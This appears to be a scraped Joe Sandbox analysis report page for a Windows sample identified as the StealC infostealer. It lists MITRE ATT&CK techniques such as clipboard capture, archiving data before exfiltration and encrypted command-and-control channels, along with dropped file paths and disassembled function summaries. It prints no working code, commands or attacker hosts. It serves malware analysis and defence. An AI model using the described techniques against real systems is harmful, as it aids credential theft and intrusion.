Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ief722WreR.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Protection of GUI

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_DADE.tmp.exe_3872fee5b628139f465ff3bc0a6daa30fd1e_fe35796b_084e609a-637f-4dbf-a000-58a93858c116\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2CB7.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2DB2.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2DD2.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\ScreenUpdateSync[1].exe

C:\Users\user\AppData\Local\Temp\DADE.tmp.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Windows Analysis Report
ief722WreR.exe

Function 004016DF Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150
clipboardsleepmemoryCOMMON

Function 004029F4 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134
networkfilesynchronizationCOMMON

Function 0043D03C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 00432F29 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Function 0248003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Function 00402C04 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 180
networkCOMMON

Function 004051D0 Relevance: 9.1, APIs: 6, Instructions: 82
COMMON

Function 00405800 Relevance: 6.0, APIs: 4, Instructions: 29
COMMON

Function 0042DFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38
threadCOMMON

Function 0042E114 Relevance: 4.6, APIs: 3, Instructions: 54
threadCOMMONLIBRARYCODE

Function 00434755 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Function 00402BAD Relevance: 4.5, APIs: 3, Instructions: 41
registryCOMMON

Function 0042E074 Relevance: 4.5, APIs: 3, Instructions: 31
threadCOMMON

Function 0040239E Relevance: 3.1, APIs: 2, Instructions: 125
windowCOMMON

Function 0040155A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101
sleepCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre